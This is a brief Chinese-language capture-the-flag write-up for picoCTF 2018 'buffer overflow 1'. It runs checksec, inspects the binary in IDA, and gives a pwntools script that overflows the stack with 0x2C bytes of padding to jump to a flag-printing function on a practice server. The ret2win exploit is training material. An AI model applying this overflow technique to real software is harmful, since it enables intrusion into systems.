picoctf_2018_buffer overflow 1

picoctf_2018_buffer overflow 1

我们先checksec一下:

1

这,这是捡到宝了,好多都没开,IDA里面看一看:

2

那就直接栈溢出,看看有没有别的好东西:

3

这个函数,直接打印flag,真好,我们就溢出这里,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

context.log_level = 'debug'

sh = remote("node5.buuoj.cn",26037)
sh.recvuntil("Please enter your string: ")
win_address = 0x80485CB

payload = b"A"*(0x28+0x4) + p32(win_address)
sh.sendline(payload)


sh.interactive()